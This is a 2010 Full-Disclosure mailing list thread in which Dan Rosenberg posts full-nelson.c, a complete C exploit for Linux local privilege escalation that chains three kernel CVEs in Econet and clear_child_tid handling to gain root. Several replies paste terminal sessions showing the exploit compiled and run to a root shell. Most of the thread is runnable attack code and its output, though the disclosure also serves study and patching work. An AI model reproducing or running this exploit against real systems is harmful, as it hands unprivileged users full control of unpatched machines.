:~$ gcc nel.c :~$ ./a.out [*] Resolving kernel addresses... [+] Resolved econet_ioctl to 0xf9c47280 [+] Resolved econet_ops to 0xf9c47360 [+] Resolved commit_creds to 0xc01625a0 [+] Resolved prepare_kernel_cred to 0xc01627a0 [*] Calculating target... [*] Triggering payload... [*] Got root! # whoami root # id uid=0(root) gid=0(root) # uname -a Linux sistemas 2.6.31-22-generic #65-Ubuntu SMP Thu Sep 16 15:48:58 UTC 2010 i686 GNU/Linux #
On Wed, Dec 8, 2010 at 14:56, Benji <[email protected]> wrote: > working here aswell > > ownst...@local[~]$ uname -a > FreeBSD local 8.1-RELEASE-p1 FreeBSD 8.1-RELEASE-p1 #4: Thu Sep 23 08:30:18 > UTC 2010 r...@benjir0x:/*usr*/*obj*/*usr*/*src*/*sys*/GENERIC amd64 > ownst...@local[~]$ ./w00tw00t > > [*] Resolving kernel addresses... > [+] Resolved econet_ioctl to 0xffffffffa0239510 > [+] Resolved econet_ops to 0xffffffffa0239600 > [+] Resolved commit_creds to 0xffffffff8108bd90 > [+] Resolved prepare_kernel_cred to 0xffffffff8108c170 > [*] Calculating target... > > [*] Failed to set Econet address. > [*] Triggering payload... > [*] Got root! > # id > uid=0(root) gid=0(root) > # > > On Wed, Dec 8, 2010 at 7:15 PM, leandro_lista < > [email protected]> wrote: > >> Works in kernel 2.6.32-24 >> >> >> >> Linux indzin-desktop 2.6.32-24-generic #41-Ubuntu SMP Thu Aug 19 01:38:40 >> UTC 2010 x86_64 GNU/Linux >> >> ind...@indzin-desktop:~$ ./nels >> [*] Resolving kernel addresses... >> [+] Resolved econet_ioctl to 0xffffffffa0239510 >> [+] Resolved econet_ops to 0xffffffffa0239600 >> [+] Resolved commit_creds to 0xffffffff8108bd90 >> [+] Resolved prepare_kernel_cred to 0xffffffff8108c170 >> [*] Calculating target... >> >> [*] Failed to set Econet address. >> [*] Triggering payload... >> [*] Got root! >> # id >> uid=0(root) gid=0(root) >> # >> >> >> :) >> >> >> >> >> -----Original Message----- >> *From*: Cal Leeming [Simplicity Media Ltd] < >> [email protected]<%22cal%20leeming%20%5bsimplicity%20media%20ltd%5d%22%20%[email protected]%3e> >> > >> *Reply-to*: [email protected] >> *To*: Dan Rosenberg >> <[email protected]<dan%20rosenberg%20%[email protected]%3e> >> > >> *Cc*: [email protected], [email protected] >> *Subject*: Re: [Full-disclosure] Linux kernel exploit >> *Date*: Tue, 07 Dec 2010 21:06:44 +0000 >> >> Anyone tested this in sandbox yet? >> >> On 07/12/2010 20:25, Dan Rosenberg wrote: >> > Hi all, >> > >> > I've included here a proof-of-concept local privilege escalation exploit >> > for Linux. Please read the header for an explanation of what's going >> > on. Without further ado, I present full-nelson.c: >> > >> > Happy hacking, >> > Dan >> > >> > >> > --snip-- >> > >> > /* >> > * Linux Kernel<= 2.6.37 local privilege escalation >> > * by Dan Rosenberg >> > * @djrbliss on twitter >> > * >> > * Usage: >> > * gcc full-nelson.c -o full-nelson >> > * ./full-nelson >> > * >> > * This exploit leverages three vulnerabilities to get root, all of which >> > were >> > * discovered by Nelson Elhage: >> > * >> > * CVE-2010-4258 >> > * ------------- >> > * This is the interesting one, and the reason I wrote this exploit. If a >> > * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a >> > NULL >> > * word will be written to a user-specified pointer when that thread >> > exits. >> > * This write is done using put_user(), which ensures the provided >> > destination >> > * resides in valid userspace by invoking access_ok(). However, Nelson >> > * discovered that when the kernel performs an address limit override via >> > * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page >> > fault, >> > * etc.), this override is not reverted before calling put_user() in the >> > exit >> > * path, allowing a user to write a NULL word to an arbitrary kernel >> > address. >> > * Note that this issue requires an additional vulnerability to trigger. >> > * >> > * CVE-2010-3849 >> > * ------------- >> > * This is a NULL pointer dereference in the Econet protocol. By itself, >> > it's >> > * fairly benign as a local denial-of-service. It's a perfect candidate >> > to >> > * trigger the above issue, since it's reachable via sock_no_sendpage(), >> > which >> > * subsequently calls sendmsg under KERNEL_DS. >> > * >> > * CVE-2010-3850 >> > * ------------- >> > * I wouldn't be able to reach the NULL pointer dereference and trigger >> > the >> > * OOPS if users weren't able to assign Econet addresses to arbitrary >> > * interfaces due to a missing capabilities check. >> > * >> > * In the interest of public safety, this exploit was specifically >> > designed to >> > * be limited: >> > * >> > * * The particular symbols I resolve are not exported on Slackware or >> > Debian >> > * * Red Hat does not support Econet by default >> > * * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and >> > * Debian >> > * >> > * However, the important issue, CVE-2010-4258, affects everyone, and it >> > would >> > * be trivial to find an unpatched DoS under KERNEL_DS and write a >> > slightly >> > * more sophisticated version of this that doesn't have the roadblocks I >> > put in >> > * to prevent abuse by script kiddies. >> > * >> > * Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64. >> > * >> > * NOTE: the exploit process will deadlock and stay in a zombie state >> > after you >> > * exit your root shell because the Econet thread OOPSes while holding the >> > * Econet mutex. It wouldn't be too hard to fix this up, but I didn't >> > bother. >> > * >> > * Greets to spender, taviso, stealth, pipacs, jono, kees, and bla >> > */ >> > >> > #include<stdio.h> >> > #include<sys/socket.h> >> > #include<fcntl.h> >> > #include<sys/ioctl.h> >> > #include<string.h> >> > #include<net/if.h> >> > #include<sched.h> >> > #include<stdlib.h> >> > #include<signal.h> >> > #include<sys/utsname.h> >> > #include<sys/mman.h> >> > #include<unistd.h> >> > >> > /* How many bytes should we clear in our >> > * function pointer to put it into userspace? */ >> > #ifdef __x86_64__ >> > #define SHIFT 24 >> > #define OFFSET 3 >> > #else >> > #define SHIFT 8 >> > #define OFFSET 1 >> > #endif >> > >> > /* thanks spender... */ >> > unsigned long get_kernel_sym(char *name) >> > { >> > FILE *f; >> > unsigned long addr; >> > char dummy; >> > char sname[512]; >> > struct utsname ver; >> > int ret; >> > int rep = 0; >> > int oldstyle = 0; >> > >> > f = fopen("/proc/kallsyms", "r"); >> > if (f == NULL) { >> > f = fopen("/proc/ksyms", "r"); >> > if (f == NULL) >> > goto fallback; >> > oldstyle = 1; >> > } >> > >> > repeat: >> > ret = 0; >> > while(ret != EOF) { >> > if (!oldstyle) >> > ret = fscanf(f, "%p %c %s\n", (void **)&addr,&dummy, >> > sname); >> > else { >> > ret = fscanf(f, "%p %s\n", (void **)&addr, sname); >> > if (ret == 2) { >> > char *p; >> > if (strstr(sname, "_O/") || strstr(sname, >> > "_S.")) >> > continue; >> > p = strrchr(sname, '_'); >> > if (p> ((char *)sname + 5)&& !strncmp(p - 3, >> > "smp", 3)) { >> > p = p - 4; >> > while (p> (char *)sname&& *(p - 1) == >> > '_') >> > p--; >> > *p = '\0'; >> > } >> > } >> > } >> > if (ret == 0) { >> > fscanf(f, "%s\n", sname); >> > continue; >> > } >> > if (!strcmp(name, sname)) { >> > fprintf(stdout, " [+] Resolved %s to %p%s\n", name, >> > (void *)addr, rep ? " (via System.map)" : ""); >> > fclose(f); >> > return addr; >> > } >> > } >> > >> > fclose(f); >> > if (rep) >> > return 0; >> > fallback: >> > uname(&ver); >> > if (strncmp(ver.release, "2.6", 3)) >> > oldstyle = 1; >> > sprintf(sname, "/boot/System.map-%s", ver.release); >> > f = fopen(sname, "r"); >> > if (f == NULL) >> > return 0; >> > rep = 1; >> > goto repeat; >> > } >> > >> > typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long >> > cred); >> > typedef unsigned long __attribute__((regparm(3))) (* >> > _prepare_kernel_cred)(unsigned long cred); >> > _commit_creds commit_creds; >> > _prepare_kernel_cred prepare_kernel_cred; >> > >> > static int __attribute__((regparm(3))) >> > getroot(void * file, void * vma) >> > { >> > >> > commit_creds(prepare_kernel_cred(0)); >> > return -1; >> > >> > } >> > >> > /* Why do I do this? Because on x86-64, the address of >> > * commit_creds and prepare_kernel_cred are loaded relative >> > * to rip, which means I can't just copy the above payload >> > * into my landing area. */ >> > void __attribute__((regparm(3))) >> > trampoline() >> > { >> > >> > #ifdef __x86_64__ >> > asm("mov $getroot, %rax; call *%rax;"); >> > #else >> > asm("mov $getroot, %eax; call *%eax;"); >> > #endif >> > >> > } >> > >> > /* Triggers a NULL pointer dereference in econet_sendmsg >> > * via sock_no_sendpage, so it's under KERNEL_DS */ >> > int trigger(int * fildes) >> > { >> > int ret; >> > struct ifreq ifr; >> > >> > memset(&ifr, 0, sizeof(ifr)); >> > strncpy(ifr.ifr_name, "eth0", IFNAMSIZ); >> > >> > ret = ioctl(fildes[2], SIOCSIFADDR,&ifr); >> > >> > if(ret< 0) { >> > printf("[*] Failed to set Econet address.\n"); >> > return -1; >> > } >> > >> > splice(fildes[3], NULL, fildes[1], NULL, 128, 0); >> > splice(fildes[0], NULL, fildes[2], NULL, 128, 0); >> > >> > /* Shouldn't get here... */ >> > exit(0); >> > } >> > >> > int main(int argc, char * argv[]) >> > { >> > unsigned long econet_ops, econet_ioctl, target, landing; >> > int fildes[4], pid; >> > void * newstack, * payload; >> > >> > /* Create file descriptors now so there are two >> > references to them after cloning...otherwise >> > the child will never return because it >> > deadlocks when trying to unlock various >> > mutexes after OOPSing */ >> > pipe(fildes); >> > fildes[2] = socket(PF_ECONET, SOCK_DGRAM, 0); >> > fildes[3] = open("/dev/zero", O_RDONLY); >> > >> > if(fildes[0]< 0 || fildes[1]< 0 || fildes[2]< 0 || fildes[3]< 0) { >> > printf("[*] Failed to open file descriptors.\n"); >> > return -1; >> > } >> > >> > /* Resolve addresses of relevant symbols */ >> > printf("[*] Resolving kernel addresses...\n"); >> > econet_ioctl = get_kernel_sym("econet_ioctl"); >> > econet_ops = get_kernel_sym("econet_ops"); >> > commit_creds = (_commit_creds) get_kernel_sym("commit_creds"); >> > prepare_kernel_cred = (_prepare_kernel_cred) >> > get_kernel_sym("prepare_kernel_cred"); >> > >> > if(!econet_ioctl || !commit_creds || !prepare_kernel_cred || >> > !econet_ops) { >> > printf("[*] Failed to resolve kernel symbols.\n"); >> > return -1; >> > } >> > >> > if(!(newstack = malloc(65536))) { >> > printf("[*] Failed to allocate memory.\n"); >> > return -1; >> > } >> > >> > printf("[*] Calculating target...\n"); >> > target = econet_ops + 10 * sizeof(void *) - OFFSET; >> > >> > /* Clear the higher bits */ >> > landing = econet_ioctl<< SHIFT>> SHIFT; >> > >> > payload = mmap((void *)(landing& ~0xfff), 2 * 4096, >> > PROT_READ | PROT_WRITE | PROT_EXEC, >> > MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0); >> > >> > if ((long)payload == -1) { >> > printf("[*] Failed to mmap() at target address.\n"); >> > return -1; >> > } >> > >> > memcpy((void *)landing,&trampoline, 1024); >> > >> > clone((int (*)(void *))trigger, >> > (void *)((unsigned long)newstack + 65536), >> > CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD, >> > &fildes, NULL, NULL, target); >> > >> > sleep(1); >> > >> > printf("[*] Triggering payload...\n"); >> > ioctl(fildes[2], 0, NULL); >> > >> > if(getuid()) { >> > printf("[*] Exploit failed to get root.\n"); >> > return -1; >> > } >> > >> > printf("[*] Got root!\n"); >> > execl("/bin/sh", "/bin/sh", NULL); >> > } >> > >> > >> > _______________________________________________ >> > Full-Disclosure - We believe in it. >> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> > Hosted and sponsored by Secunia - http://secunia.com/ >> > >> >> >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- David Flores Velázquez Email: [email protected] <http://twitter.com/dmouse>
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
